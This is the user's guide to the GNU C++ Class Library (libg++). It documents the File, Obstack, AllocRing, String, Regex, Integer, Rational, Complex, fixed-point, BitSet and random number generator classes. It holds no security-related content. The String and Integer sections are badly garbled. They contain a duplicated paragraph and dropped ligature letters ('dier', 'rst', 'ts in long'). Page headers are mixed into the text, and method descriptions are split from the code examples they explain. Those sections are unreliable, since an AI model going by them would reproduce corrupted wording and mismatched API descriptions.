The class contains four general kinds of functions: methods for binding Files to physical Unix files, basic IO methods, file and buffer control methods, and methods for maintaining logical and physical file status. Binding and related tasks are accomplished via File constructors and destructors, and member functions open, close, remove, filedesc, name, setname.
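The kind of stdio wrapping described here can be sketched with a much-reduced stand-in class. This is not the real File class (which has many more members); the names below mirror only the part of its interface discussed in the text, and the error handling is deliberately minimal:

```cpp
#include <cstdio>

// Minimal File-like wrapper: construction binds to a stdio FILE*,
// basic IO forwards to stdio calls, and the destructor closes the
// file, roughly as described for the (obsolete) File class.
class MiniFile {
protected:
  FILE* fp;   // the stdio file pointer, kept protected as in File
public:
  MiniFile() : fp(0) {}
  explicit MiniFile(FILE* f) : fp(f) {}
  ~MiniFile() { if (fp) fclose(fp); }

  int is_open() const { return fp != 0; }
  int get(char& c) {                    // forwards to stdio getc
    int ch = getc(fp);
    if (ch == EOF) return 0;
    c = (char)ch;
    return 1;
  }
  int put(char c) { return putc(c, fp) != EOF; }
  int put(const char* s) { return fputs(s, fp) != EOF; }  // null-terminated string
  void flush() { fflush(fp); }
  void seek(long pos) { fseek(fp, pos, SEEK_SET); }
  long tell() { return ftell(fp); }
};
```

For example, MiniFile f(tmpfile()) binds the wrapper to a scratch file that is closed (and removed) when f is destroyed.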
If a file name is provided in a constructor or open, it is maintained as class variable nm and is accessible via name. If no name is provided, then nm remains null, except that Files bound to the default files stdin, stdout, and stderr are automatically given the names (stdin), (stdout), (stderr) respectively. The function setname may be used to change the internal name of the File. This does not change the name of the physical file bound to the File.

The member function close closes a file. The ~File destructor closes a file if it is open, except that stdin, stdout, and stderr are flushed but left open for the system to close on program exit, since some systems may require this, and on others it does not matter. remove closes the file, and then deletes it if possible by calling the system function to delete the file with the name provided in the nm field.

14.2 Basic IO

read and write perform binary IO via stdio fread and fwrite. get and put for chars invoke stdio getc and putc macros. put(const char* s) outputs a null-terminated string via stdio fputs. unget and putback are synonyms. Both call stdio ungetc.

14.3 File Control

flush, seek, and tell call the corresponding stdio functions. flush(char) and fill() call stdio _flsbuf and _filbuf respectively. setbuf is mainly useful to turn off buffering in cases where IO via Files is intermixed with raw IO via file descriptors. setbuf should be called at most once after a constructor or open, but before any IO.

14.4 File Status

File status is maintained in several ways. A File may be checked for accessibility via is_open(), which returns true if the File is bound to a usable physical file. The logical state of a File is maintained in status flags accessible via rdstate(). The _eof flag becomes true only after an input operation fails because no more input is available; therefore, _eof is not immediately true after the last successful read of a file, but only after one final read attempt. Thus, for input operations, _fail and _eof almost always become true at the same time. _bad is set for unbound files, and may also be set by applications in order to communicate input corruption.
Conversely, _good is defined as 0 and is returned by rdstate() if all is well. The state may be modified via clear(flag), which, despite its name, sets the corresponding state value flag. clear() with no arguments resets the state to _good. failif(int cond) sets the state to _fail only if cond is true. User-defined handlers for errors occurring during File operations can be selected via the non-member function set_File_error_handler. All read and write operations communicate either logical or physical failure by setting the _fail flag.

15 The Obstack class

The Obstack class is an adaptation of the GNU C obstack macros; test files in the distribution demonstrate usage. A brief summary:

grow
    Places something on the obstack without committing to wrap it up as a single entity yet.
finish
    Wraps up a constructed object as a single entity, and returns the pointer to its start address.
copy
    Places things on the obstack, and does wrap them up. copy is always equivalent to first grow, then finish.
free
    Deletes something, and anything else put on the obstack since its creation.

The other functions are less commonly needed:

blank
    Like grow, except it just grows the space by size units without placing anything into this space.
alloc
    Like blank, but it wraps up the object and returns its starting address.
chunk_size, base, next_free, alignment_mask, size, room
    Return the appropriate class variables.
grow_fast
    Places a character on the obstack without checking if there is enough room.
blank_fast
    Like blank, but without checking if there is enough room.
shrink(int n)
    Shrinks the current chunk by n bytes.
contains(void* addr)
    Returns true if the Obstack holds the address addr.

Once an object is "finished", it never changes address again. So the "top of the stack" is typically an immature growing object, while the rest of the stack is of mature, fixed size and fixed address objects. These routines grab large chunks of memory, using the GNU C++ new operator.
On occasion, they free chunks, via delete. Each independent stack is represented by an Obstack.

Consider, for example, reading symbol names into a buffer, realloc()ating the buffer every time you try to read a symbol that is longer than the buffer. This works, but you will still want to copy the symbol from the buffer to a more permanent symbol-table entry about half the time. With obstacks, you can work differently. Use one obstack for all symbol names. As you read a symbol, grow the name in the obstack gradually. When the name is complete, finish it; if the symbol turns out not to be needed, it can be freed again, so nothing need be copied or shuffled. The obstack data structure is used in many places in the GNU C++ compiler.

Differences from the GNU C version:

1. The obvious differences stemming from the use of classes and inline functions instead of structs and macros. The C init and begin macros are replaced by constructors.

2. Overloaded function names are used for grow (and others), rather than the C grow, grow0, etc.

3. All dynamic allocation uses the built-in new operator. This restricts flexibility by a little, but maintains compatibility with usual C++ conventions.

4. There are now two versions of finish:
   1. finish() behaves like the C version.
   2. finish(char terminator) adds terminator, and then calls finish(). This enables the normal invocation of finish(0) to wrap up a string being grown character-by-character.

5. There are special versions of grow(const char* s) and copy(const char* s) that add the null-terminated string s after computing its length.

6. The shrink and contains functions are provided.

16 The AllocRing class

An AllocRing is a bounded ring (circular list), each of whose elements contains a pointer to some space allocated via new char[some_size]. The entries are used cyclicly. The size, n, of the ring is fixed at construction: AllocRing a(int n) constructs an AllocRing with n entries, all null.
void* mem = a.alloc(sz)
    Moves the ring pointer to the next entry, and reuses the space if there is enough, else allocates space via new char[sz].
int present = a.contains(void* ptr)
    Returns true if ptr is held in one of the ring entries.
a.clear()
    Deletes all space pointed to in any entry. This is called automatically upon destruction.
a.free(void* ptr)
    If ptr is one of the entries, calls delete of the pointer, and resets the entry pointer to null.

17 The String class

The String class is designed to extend GNU C++ to support string processing capabilities similar to those in languages like Awk. The class provides facilities that ought to be convenient and efficient enough to be useful replacements for char* based processing via the C string library (i.e., strcpy, strcmp, etc.) in many applications. Many details about String representations are described in the Representation section. A separate SubString class supports substring extraction and modification. See section "Syntax of Regular Expressions" in GNU Emacs Manual, for a full explanation of regular expression syntax. (For implementation details, see the internal documentation in files `regex.h' and `regex.c'.)

17.1 Constructors

Strings are initialized and assigned as in the following examples:

String x; String y = 0; String z = "";
    Set x, y, and z to the nil string. Note that either 0 or "" may always be used to refer to the nil string.
String x = "Hello"; String y("Hello");
    Set x and y to a copy of the string "Hello".
String x = 'A'; String y('A');
    Set x and y to the string value "A".
String u = x; String v(x);
    Set u and v to the same string as String x.
String u = x.at(1, 4); String v(x.at(1, 4));
    Set u and v to the length 4 substring of x starting at position 1 (counting indexes from 0).
String x("abc", 2);
    Sets x to "ab", i.e., the first 2 characters of "abc".
String x = dec(20);
    Sets x to "20".

As here, Strings may be initialized or assigned the results of any char* function. There are no directly accessible forms for declaring SubString variables.

The declaration

    Regex r("[a-zA-Z_][a-zA-Z0-9_]*");

creates a compiled regular expression suitable for use in String operations described below. (In this case, one that matches any C++ identifier.) The constructor accepts two further optional arguments:

bufsize (default max(40, length of the string))
    An estimate of the size of the internal compiled expression. Set it to a larger value if you know that the expression will require a lot of space. If you do not know, do not worry: realloc is used if necessary.
transtable (default none == 0)
    The address of a byte translation table (a char[256]) that translates each character before matching.

As a convenience, several Regexes are predefined and usable in any program. Here are their declarations from `String.h'.

    extern Regex RXwhite;      // = "[ \n\t]+"
    extern Regex RXint;        // = "-?[0-9]+"
    extern Regex RXdouble;     // = "-?\\(\\([0-9]+\\.[0-9]*\\)\\|\\([0-9]+\\)\\|\\(\\.[0-9]+\\)\\)\\([eE][---+]?[0-9]+\\)?"
    extern Regex RXalpha;      // = "[A-Za-z]+"
    extern Regex RXlowercase;  // = "[a-z]+"
    extern Regex RXuppercase;  // = "[A-Z]+"
    extern Regex RXalphanum;   // = "[0-9A-Za-z]+"
    extern Regex RXidentifier; // = "[A-Za-z_][A-Za-z0-9_]*"

17.2 Examples

Most String class capabilities are best shown via example. The examples below use the following declarations:

    String x = "Hello";
    String y = "world";
    String z;
    char*  s = ",";

17.3 Comparing, Searching and Matching

The usual lexicographic relational operators (==, !=, <, <=, >, >=) are defined. A functional form compare(String, String) is also provided, as is fcompare(String, String), which compares Strings without regard for upper vs. lower case.

All other matching and searching operations are based on some form of the (non-public) match and search functions. match and search differ in that match attempts to match only at the given starting position, while search starts at the position, and then proceeds left or right looking for a match. As seen in the following examples, the second optional startpos argument to functions using match and search specifies the starting position of the search: a negative value causes the search to proceed right-to-left.

x.index("l", 2)
    Returns the index of the first of the leftmost occurrence of "l" found starting the search at position x[2], or 2 in this case.
x.index("l", -1)
    Returns the index of the rightmost occurrence of "l", or 3 here.
x.index("l", -3)
    Returns the index of the rightmost occurrence of "l" found by starting the search at the 3rd to the last position of x, returning 2 in this case.
All other matching and searching operations are based on some form of the (non-public) match and search functions. match and search dier in that match attempts to match only at the given starting position, while search starts at the position, and then proceeds left or right looking for a match. As seen in the following examples, the second optional startpos argument to functions using match and search species. returns the index of the rst of the leftmost occurrence of "l" found starting the search at position x[2], or 2 in this case. returns the index of the rightmost occurrence of "l", or 3 here. x.index("l", 2) x.index("l", -1) x.index("l", -3) returns the index of the rightmost occurrence of "l" found by starting the search at the 3rd to the last position of x, returning 2 in this case. 54 User's Guide to the GNU C++ Class Library pos = r.search("leo", 3, len, 0) returns the index of r in the char* string of length 3, starting at position 0, also placing the length of the match in reference parameter len. returns nonzero if the String x contains the substring "He". The argument may be a String, SubString, char, char*, or Regex. returns nonzero if x contains the substring "el" at position 1. As in this example, the second argument to contains, if present, means to match the substring only at that position, and not to search elsewhere in the string. returns nonzero if x contains any whitespace (space, tab, or newline). Recall that RXwhite is a global whitespace Regex. returns nonzero if x starting at position 3 exactly matches "lo", with no trailing characters (as it does in this example). returns nonzero if String x as a whole matches Regex r. x.contains("He") x.contains("el", 1) x.contains(RXwhite); x.matches("lo", 3) x.matches(r) int f = x.freq("l") returns the number of distinct, nonoverlapping matches to the argument (2 in this case). 17.4. Sets what was in positions 2 to 3 of x to "r", setting x to "Hero" in this case. 
As indicated here, SubString assignments may be of dierent lengths. the substring of x that matches the rst occurrence of it's argument. The substitution sets x to "jello". If "He" did not occur, the substring would be nil, and the assignment would have no eect. replaces the rightmost occurrence of "l" with "i", setting x to "Helio". sets String z to the rst match in x of Regex r, or "ello" in this case. A nil String is returned if there is no match. x.at(2, 2) = "r" x.at("He") = "je"; x("He") is x.at("l", -1) = "i"; z = x.at(r) Chapter 17: The String class 55 z = x.before("o") sets z to the part of x to the left of the rst occurrence of "o", or "Hell" in this case. The argument may also be a String, SubString, or Regex. (If there is no match, z is set to "".) sets the part of x to the left of "ll" to "Bri", setting x to "Brillo". sets z to the part of x to the left of x[2], or "He" in this case. sets z to the part of x to the right of "Hel", or "lo" in this case. sets z to the part of x up and including "el", or "Hel" in this case. sets z to the part of x from "el" to the end, or "ello" in this case. x.before("ll") = "Bri"; z = x.before(2) z = x.after("Hel") z = x.through("el") z = x.from("el") x.after("Hel") = "p"; sets x to "Help"; z = x.after(3) sets z to the part of x to the right of x[3] or "o" in this case. sets z to the part of its old string to the right of the rst group of whitespace, setting z to "ab c"; Use gsub(below) to strip out multiple occurrences of whitespace or any pattern. sets the rst element of x to 'J'. x[i] returns a reference to the ith element of x, or triggers an error if i is out of range. returns the String containing the common prex of the two Strings or "Hel" in this case. returns the String containing the common sux of the two Strings or "o" in this case. 
z = " ab c"; z = z.after(RXwhite) x[0] = 'J'; common_prefix(x, "Help") common_suffix(x, "to") 17.5 Concatenation z = x + s + ' ' + y.at("w") + y.after("w") + "."; sets z to "Hello, world." x += y; sets x to "Helloworld" cat(x, y, z) A faster way to say z = x + y. Double concatenation; A faster way to say x = z + y + x. cat(z, y, x, x) 56 User's Guide to the GNU C++ Class Library y.prepend(x); A faster way to say y = x + y. z = replicate(x, 3); sets z to "HelloHelloHello". z = join(words, 3, "/") sets z to the concatenation of the rst 3 Strings in String array words, each separated by "/", setting z to "a/b/c" in this case. The last argument may be "" or 0, indicating no separation. 17.6. substitutes all original occurrences of "l" with "ll", setting x to "Hellllo". The rst argument may be any of the usual, including Regex. If the second argument is "" or 0, all occurrences are deleted. gsub returns the number of matches that were replaced. deletes the leftmost occurrence of "loworl" in z, setting z to "Held". sets z to the reverse of x, or "olleH". sets z to x, with all letters set to uppercase, setting z to "HELLO" sets z to x, with all letters set to lowercase, setting z to "hello" sets z to x, with the rst letter of each word set to uppercase, and all others to lowercase, setting z to "Hello" in-place, self-modifying versions of the above. int nmatches x.gsub("l","ll") z = x + y; z.del("loworl"); z = reverse(x) z = upcase(x) z = downcase(x) z = capitalize(x) x.reverse(), x.upcase(), x.downcase(), x.capitalize() 17.7 Reading, Writing and Conversion cout << x writes out x. writes out the substring "llo". reads a whitespace-bounded string into x. cout << x.at(2, 3) cin >> x Chapter 17: The String class 57 x.length() returns the length of String x (5, in this case). dened to return a const value so that GNU C++ will produce warning and/or error messages if changes are attempted.) 
s = (const char*)x 58 User's Guide to the GNU C++ Class Library Chapter 18: The Integer class. 59 18 The Integer class. dicult; Declares an uninitialized Integer. Set x and y to the Integer value 2; Set u and v to the same value as x. Integer x = 2; Integer y(2); Integer u(x); Integer v = x; Integer::as long const Method Used to coerce an Integer back into longs via the long coercion operator. If the Integer cannot t into a long, this returns MINLONG or MAXLONG (depending on the sign) where MINLONG is the most negative, and MAXLONG is the most positive representable long. int Integer::ts in long const Method Returns true i the Integer is < MAXLONG and > MINLONG. double Integer::as double const Method Coerce the Integer to a double, with potential loss of precision. +/-HUGE is returned if the Integer cannot t into a double. int Integer::ts in double const Method Returns true i the Integer can t dierently than the corresponding int or long operators are ++ and --. Because C++ does not distinguish prex from postx application, these are declared as void operators, so that no confusion can result from applying them as postx. rst argument. For example, Integer(-3) & Integer(5) returns long 60 User's Guide to the GNU C++ Class Library). void divide(const Integer& x, const Integer& y, Integer& q, Function Integer& r ) Sets q to the quotient and r to the remainder of x and y. (q and r are returned by reference). Integer pow(const Integer& x, const Integer& p) Function Returns x raised to the power p. Integer Ipow(long x, long p Function Returns x raised to the power p. Integer gcd(const Integer& x, const Integer& p) Function Returns the greatest common divisor of x and y. Integer lcm(const Integer& x, const Integer& p) Function Returns the least common multiple of x and y. Integer abs(const Integer& x Function Returns the absolute value of x. void Integer::negate Method Negates this in place. Integer sqr(x) returns x * x; returns the oor of the square root of x. 
returns the oor of the base 2 logarithm of abs(x) returns -1 if x is negative, 0 if zero, else +1. Using if (sign(x) == 0) is a generally faster method of testing for zero than using relational operators. returns true if x is an even number returns true if x is an odd number. sets the b'th bit (counting right-to-left from zero) of x to 1. sets the b'th bit of x to 0. Integer sqrt(x) long lg(x); int sign(x) int even(x) int odd(x) void setbit(Integer& x, long b) void clearbit(Integer& x, long b) Chapter 18: The Integer class. 61 int testbit(Integer x, long b) returns true if the b'th bit of x is 1. converts the base base char* string into its Integer form. in eld width at least Integer atoI(char* asciinumber, int base = 10); void Integer::printon(ostream& s, int base = 10, int width = 0); prints the ascii string value of (*this) as a base base number, width. ostream << x; istream >> x; prints x in base ten format. reads x as a base ten number. returns a negative number if x<y, zero if x==y, or positive if x>y. like compare, but performs unsigned comparison. = pow(x, y). A faster way to say z = ) 62 User's Guide to the GNU C++ Class Library negate(x, z) A faster way to say z = -x. Chapter 19: The Rational Class 63 19 The Rational Class Class Rational provides multiple precision rational number arithmetic. All rationals are maintained in simplest form (i.e., with the numerator and denominator relatively prime, and with the denominator strictly positive). Rational arithmetic and relational operators are provided (+, -, *, /, +=, -=, *=, /=, ==, !=, <, <=, >, >=). Operations resulting in a rational number with zero denominator trigger an exception. Rationals may be constructed and used in the following ways: Rational x; Declares an uninitialized Rational. Set x and y to the Rational value 2/1; Sets x to the Rational value 2/3; Sets x to a Rational value close to 1.2. Any double precision value may be used to construct a Rational. 
The Rational will possess exactly as much precision as the double. Double values that do not have precise floating point equivalents (like 1.2) produce similarly imprecise rational values.

Rational x(Integer(123), Integer(4567));    Sets x to the Rational value 123/4567.
Rational u(x); Rational v = x;    Set u and v to the same value as x.
double(Rational x)    A Rational may be coerced to a double with potential loss of precision. +/-HUGE is returned if it will not fit.
Rational abs(x)    returns the absolute value of x.
void x.negate()    negates x.
void x.invert()    sets x to 1/x.
int sign(x)    returns 0 if x is zero, 1 if positive, and -1 if negative.
Rational sqr(x)    returns x * x.
Rational pow(x, Integer y)    returns x to the y power.
Integer x.numerator()    returns the numerator.
Integer x.denominator()    returns the denominator.
Integer floor(x)    returns the greatest Integer less than x.
Integer ceil(x)    returns the least Integer greater than x.
Integer trunc(x)    returns the Integer part of x.
Integer round(x)    returns the nearest Integer to x.
int compare(x, y)    returns a negative, zero, or positive number signifying whether x is less than, equal to, or greater than y.
ostream << x;    prints x in the form num/den, or just num if the denominator is one.
istream >> x;    reads x in the form num/den, or just num, in which case the denominator is set to one.
add(x, y, z)    A faster way to say z = x + y.
sub(x, y, z)    A faster way to say z = x - y.
mul(x, y, z)    A faster way to say z = x * y.
div(x, y, z)    A faster way to say z = x / y.
pow(x, y, z)    A faster way to say z = pow(x, y).
negate(x, z)    A faster way to say z = -x.

20 The Complex class

Complex x;    Declares an uninitialized Complex.
Complex x = 2; Complex y(2);    Set x and y to the Complex value (2.0, 0.0).
Complex x(2, 3);    Sets x to the Complex value (2, 3).
Complex u(x); Complex v = x;    Set u and v to the same value as x.
double real(Complex& x)    returns the real part of x.
double imag(Complex& x)    returns the imaginary part of x.
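The Complex interface here survives almost unchanged in the standard library's std::complex, so its behavior can be checked with any modern compiler. A sketch (`reflect` is an illustrative name of mine):

```cpp
#include <cmath>
#include <complex>

// std::complex provides the same accessor set described in this chapter:
// abs (magnitude), norm (squared magnitude), arg (amplitude), polar, conj.
std::complex<double> reflect(const std::complex<double>& x) {
    // conj(x) mirrors x across the real axis: arg flips sign, abs unchanged.
    return std::conj(x);
}
```

For z = (3, 4), std::abs(z) is 5, std::norm(z) is 25, and reflect(z) is (3, -4).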
double abs(Complex& x)    returns the magnitude of x.
double norm(Complex& x)    returns the square of the magnitude of x.
double arg(Complex& x)    returns the argument (amplitude) of x.
Complex polar(double r, double t)    returns a Complex with abs of r and arg of t.
Complex conj(Complex& x)    returns the complex conjugate of x.
Complex cos(Complex& x)    returns the complex cosine of x.
Complex sin(Complex& x)    returns the complex sine of x.
Complex cosh(Complex& x)    returns the complex hyperbolic cosine of x.
Complex sinh(Complex& x)    returns the complex hyperbolic sine of x.
Complex exp(Complex& x)    returns the exponential of x.
Complex log(Complex& x)    returns the natural log of x.
Complex pow(Complex& x, long p)    returns x raised to the p power.
Complex pow(Complex& x, Complex& p)    returns x raised to the p power.
Complex sqrt(Complex& x)    returns the square root of x.
ostream << x;    prints x in the form (re, im).
istream >> x;    reads x in the form (re, im), or just (re) or re, in which case the imaginary part is set to zero.

21 Fixed precision numbers

Classes Fix16, Fix24, Fix32, and Fix48 support operations on 16, 24, 32, or 48 bit quantities that are considered as real numbers in the range [-1, +1). Such numbers are often encountered in digital signal processing applications. The classes may be used in isolation or together. Class Fix32 operations are entirely self-contained. Class Fix16 operations are self-contained except that the multiplication operation Fix16 * Fix16 returns a Fix32. Fix24 and Fix48 are similarly related.

The standard arithmetic and relational operations are supported (=, +, -, *, /, <<, >>, +=, -=, *=, /=, <<=, >>=, ==, !=, <, <=, >, >=). All operations include provisions for special handling in cases where the result exceeds +/- 1.0. There are two cases that may be handled separately: "overflow", where the results of addition and subtraction operations go out of range, and all other "range errors", in which resulting values go off-scale (as with division operations, and assignment or initialization with off-scale values). In signal processing applications, it is often useful to handle these two cases differently.
Handlers take one argument, a reference to the integer mantissa of the offending value, which may then be manipulated. In cases of overflow, this value is the result of the (integer) arithmetic computation on the mantissa; in others it is a fully saturated (i.e., most positive or most negative) value. Handling may be reset to any of several provided functions or any other user-defined function via set_overflow_handler and set_range_error_handler. The provided functions for Fix16 are as follows (corresponding functions are also supported for the others).

Fix16_overflow_saturate    The default overflow handler. Results are "saturated": positive results are set to the largest representable value (binary 0.111111...), and negative values to -1.0.
Fix16_ignore    Performs no action. For overflow, this will allow addition and subtraction operations to "wrap around" in the same manner as integer arithmetic, and for saturation, will leave values saturated.
Fix16_overflow_warning_saturate    Prints a warning message on standard error, then saturates the results.
Fix16_warning    The default range error handler. Prints a warning message on standard error, otherwise leaving the argument unmodified.
Fix16_abort    Prints an error message on standard error, then aborts execution.

In addition to arithmetic operations, the following are provided:

Fix16 a = 0.5;    Constructs fixed precision objects from double precision values. Attempting to initialize to a value outside the range invokes the range error handler, except, as a convenience, initialization to 1.0 sets the variable to the most positive representable value (binary 0.1111111...) without invoking the handler.
short& mantissa(a); long& mantissa(b);    return a * pow(2, 15) or b * pow(2, 31) as an integer. These are returned by reference, to enable "manual" data manipulation.
double value(a); double value(b);    return a or b as floating point numbers.
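The default saturating behavior described above (results clamped to the most positive or most negative representable value) can be sketched for a 16-bit mantissa in standard C++. `sat_add16` is an illustrative name, and this is assumed semantics reconstructed from the description, not the libg++ implementation:

```cpp
#include <cstdint>

// Sketch of Fix16_overflow_saturate-style handling: add two 16-bit
// mantissas, clamping out-of-range results instead of wrapping around.
std::int16_t sat_add16(std::int16_t a, std::int16_t b) {
    std::int32_t s = std::int32_t(a) + b;    // widen so overflow is visible
    if (s > INT16_MAX) return INT16_MAX;     // saturate positive results
    if (s < INT16_MIN) return INT16_MIN;     // saturate at -1.0 equivalent
    return std::int16_t(s);
}
```

By contrast, the Fix16_ignore policy corresponds to letting the 16-bit addition wrap around as ordinary integer arithmetic would.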
22 Classes for Bit manipulation

libg++ provides several different classes supporting the use and manipulation of collections of bits in different ways.

Class Integer provides "integer" semantics. It supports manipulation of bits in ways that are often useful when treating bit arrays as numerical (integer) quantities. This class is described elsewhere.
Class BitSet provides "set" semantics. It supports operations useful when treating collections of bits as representing potentially infinite sets of integers.
Class BitSet32 supports fixed-length BitSets holding exactly 32 bits.
Class BitSet256 supports fixed-length BitSets holding exactly 256 bits.
Class BitString provides "string" (or "vector") semantics. It supports operations useful when treating collections of bits as strings of zeros and ones.

These classes also differ in the following ways:

BitSets are logically infinite. Their space is dynamically altered to adjust to the smallest number of consecutive bits actually required to represent the sets. Integers also have this property. BitStrings are logically finite, but their sizes are internally dynamically managed to maintain proper length. This means that, for example, BitStrings are concatenatable while BitSets and Integers are not.
BitSet32 and BitSet256 have precisely the same properties as BitSets, except that they use constant fixed length bit vectors.
While all classes support basic unary and binary operations ~, &, |, ^, -, the semantics differ. BitSets perform bit operations that precisely mirror those for infinite sets. For example, complementing an empty BitSet returns one representing an infinite set.
Only BitStrings support substring extraction and bit pattern matching.

22.1 BitSet

BitSets are objects that contain logically infinite sets of nonnegative integers. Representational details are discussed in the Representation chapter.
Because they are logically infinite, all BitSets possess a trailing, infinitely replicated 0 or 1 bit, called the "virtual bit", and indicated via 0* or 1*. BitSet32 and BitSet256 have the same properties, except that they are of fixed length, and thus have no virtual bit.

BitSets may be constructed as follows:

BitSet a;    declares an empty BitSet.
BitSet a = atoBitSet("001000");    sets a to the BitSet 0010*, reading left-to-right. The "0*" indicates that the set ends with an infinite number of zero (clear) bits.
BitSet a = atoBitSet("00101*");    sets a to the BitSet 00101*, where "1*" means that the set ends with an infinite number of one (set) bits.
BitSet a = longtoBitSet((long)23);    sets a to the BitSet 111010*, the binary representation of decimal 23.
BitSet a = utoBitSet((unsigned)23);    sets a to the BitSet 111010*, the binary representation of decimal 23.

The following functions and operators are provided. (Assume the declarations of BitSets a = 0011010*, b = 101101*, throughout, as examples.)

~a    returns the complement of a, or 1100101* in this case.
a.complement()    sets a to ~a.
a & b; a &= b;    returns a intersected with b, or 0011010*.
a | b; a |= b;    returns a unioned with b, or 1011111*.
a - b; a -= b;    returns the set difference of a and b, or 000010*.
a ^ b; a ^= b;    returns the symmetric difference of a and b, or 1000101*.
a.empty()    returns true if a is an empty set.
a == b;    returns true if a and b contain the same set.
a <= b;    returns true if a is a subset of b.
a < b;    returns true if a is a proper subset of b.
a != b; a >= b; a > b;    are the converses of the above.
a.set(7)    sets the 7th (counting from 0) bit of a, setting a to 001111010*.
a.clear(2)    clears the 2nd bit of a, setting a to 00011110*.
a.clear()    clears all bits of a.
a.set()    sets all bits of a.
a.invert(0)    complements the 0th bit of a, setting a to 10011110*.
a.set(0, 1)    sets the 0th through 1st bits of a, setting a to 110111110*. The two-argument versions of clear and invert are similar.
a.test(3)    returns true if the 3rd bit of a is set.
a.test(3, 5)    returns true if any of bits 3 through 5 are set.
int i = a[3]; a[3] = 0;    The subscript operator allows bits to be inspected and changed via standard subscript semantics, using a friend class BitSetBit. The use of the subscript operator a[i] rather than a.test(i) requires somewhat greater overhead.
a.first(1) or a.first()    returns the index of the first set bit of a (2 in this case), or -1 if no bits are set.
a.first(0)    returns the index of the first clear bit of a (0 in this case), or -1 if no bits are clear.
a.next(2, 1) or a.next(2)    returns the index of the next bit after position 2 that is set (3 in this case), or -1. first and next may be used as iterators, as in for (int i = a.first(); i >= 0; i = a.next(i)) ....
a.last(1)    returns the index of the rightmost set bit, or -1 if there are no set bits or all bits are set.
a.prev(3, 0)    returns the index of the previous clear bit before position 3.
a.count(1)    returns the number of set bits in a, or -1 if there are an infinite number.
a.virtual_bit()    returns the trailing (infinitely replicated) bit of a.
a = atoBitSet("ababX", 'a', 'b', 'X');    converts the char* string into a BitSet, with 'a' denoting false, 'b' denoting true, and 'X' denoting the infinite replication marker.
cout << a    prints a to cout, representing falses by 'f', trues by 't', and using '*' as the replication marker.
a.printon(cout, '-', '.', 0)    prints a to cout, representing falses by '-', trues by '.', and with no replication marker.
diff(x, y, z)    A faster way to say z = x - y.
and(x, y, z)    A faster way to say z = x & y.
or(x, y, z)    A faster way to say z = x | y.
xor(x, y, z)    A faster way to say z = x ^ y.
complement(x, z)    A faster way to say z = ~x.
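For the fixed-length variants BitSet32 and BitSet256, std::bitset is the closest modern analogue of the set/clear/invert/test/count operations above (the logically infinite BitSet has no standard equivalent). A small sketch, with `make_set` as an illustrative name:

```cpp
#include <bitset>

// Fixed-width BitSet32-style manipulation with std::bitset:
// set/test/count/flip parallel a.set(i), a.test(i), a.count(), a.invert(i).
std::bitset<32> make_set() {
    std::bitset<32> a;
    a.set(2);       // like a.set(2)
    a.set(3);
    a.flip(3);      // like a.invert(3): bit 3 goes back to 0
    return a;
}
```

After these operations only bit 2 is set, so test(2) is true and count() is 1.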
22.2 BitString

…

a = b + c;    Sets a to the concatenation of b and c.
a = b + 0; a = b + 1;    sets a to b, appended with a zero (one).
a += b;    appends b to a.
a += 0; a += 1;    appends a zero (one) to a.
…    return a with 2 zeros prepended, setting a to 0001010110. (Note the necessary confusion of << and >> operators. For consistency with the integer versions, << shifts low bits to high, even though they are printed low bits first.)
…    return a with the first 3 bits deleted, setting a to 10110.
…    deletes all 0 bits on the left of a, setting a to 1010110.
…    deletes all trailing 0 bits of a, setting a to 0101011.

23 Random Number Generators and related classes

The two classes RNG and Random are used together to generate a variety of random number distributions. A distinction must be made between random number generators, implemented by class RNG, and random number distributions. A random number generator produces a series of randomly ordered bits. These bits can be used directly, or cast to other representations, such as a floating point value. A random number generator should produce a uniform distribution. A random number distribution, on the other hand, uses the randomly generated bits of a generator to produce numbers from a distribution with specific properties. Each instance of Random uses an instance of class RNG to provide the raw, uniform distribution used to produce the specific distribution. Several instances of Random classes can share the same instance of RNG, or each instance can use its own copy.

23.1 RNG

Random distributions are constructed from members of class RNG, the actual random number generators. The RNG class contains no data; it only serves to define the interface to random number generators. The RNG::asLong member returns an unsigned long (typically 32 bits) of random bits. Applications that require a number of random bits can use this directly.
More often, these random bits are transformed to a uniform random number using either asFloat or asDouble:

//
// Return random bits converted to either a float or a double
//
float asFloat();
double asDouble();
};

It is intended that asFloat and asDouble return differing precisions; typically, asDouble will draw two random longwords and transform them into a legal double, while asFloat will draw a single longword and transform it into a legal float. These members are used by subclasses of the Random class to implement a variety of random number distributions.

23.2 ACG

Class ACG is a variant of a Linear Congruential Generator (Algorithm M) described in Knuth, Art of Computer Programming, Vol III. This result is permuted with a Fibonacci Additive Congruential Generator to get good independence between samples. This is a very high quality random number generator, although it requires a fair amount of memory for each instance of the generator.

The ACG::ACG constructor takes two parameters: the seed and the size. The seed is any number to be used as an initial seed. The performance of the generator depends on having a distribution of bits through the seed. If you choose a number in the range of 0 to 31, a seed with more bits is chosen. Other values are deterministically modified to give a better distribution of bits. This provides a good random number generator while still allowing a sequence to be repeated given the same initial seed.

The size parameter determines the size of two tables used in the generator. The first table is used in the Additive Generator; see the algorithm in Knuth for more information. In general, this table is size longwords long. The default value, used in the algorithm in Knuth, gives a table of 220 bytes. The table size affects the period of the generators; smaller values give shorter periods and larger tables give longer periods. The smallest table size is 7 longwords, and the longest is 98 longwords.
The size parameter also determines the size of the table used for the Linear Congruential Generator. This value is chosen implicitly based on the size of the Additive Congruential Generator table. It is two powers of two larger than the power of two that is larger than size. For example, if size is 7, the ACG table is 7 longwords and the LCG table is 128 longwords. Thus, the default size (55) requires 55 + 256 longwords, or 1244 bytes. The largest table requires 2440 bytes and the smallest table requires 100 bytes. Applications that require a large number of generators, or applications that aren't so fussy about the quality of the generator, may elect to use the MLCG generator.

23.3 MLCG

The MLCG class implements a Multiplicative Linear Congruential Generator. In particular, it is an implementation of the double MLCG described in "Efficient and Portable Combined Random Number Generators" by Pierre L'Ecuyer, appearing in Communications of the ACM, Vol. 31, No. 6. This generator has a fairly long period, and has been statistically analyzed to show that it gives good inter-sample independence.

The MLCG::MLCG constructor has two parameters, both of which are seeds for the generator. As in the ACG generator, both seeds are modified to give a "better" distribution of seed digits. Thus, you can safely use values such as `0' or `1' for the seeds. The MLCG generator uses much less state than the ACG generator; only two longwords (8 bytes) are needed for each generator.

23.4 Random

A random number generator may be declared by first declaring a RNG and then a Random. For example,

ACG gen(10, 20);
NegativeExpntl rnd(1.0, &gen);

declares an additive congruential generator with seed 10 and table size 20, which is used to generate exponentially distributed values with mean of 1.0.

The virtual member Random::operator() is the common way of extracting a random number from a particular distribution. The base class, Random, does not implement operator().
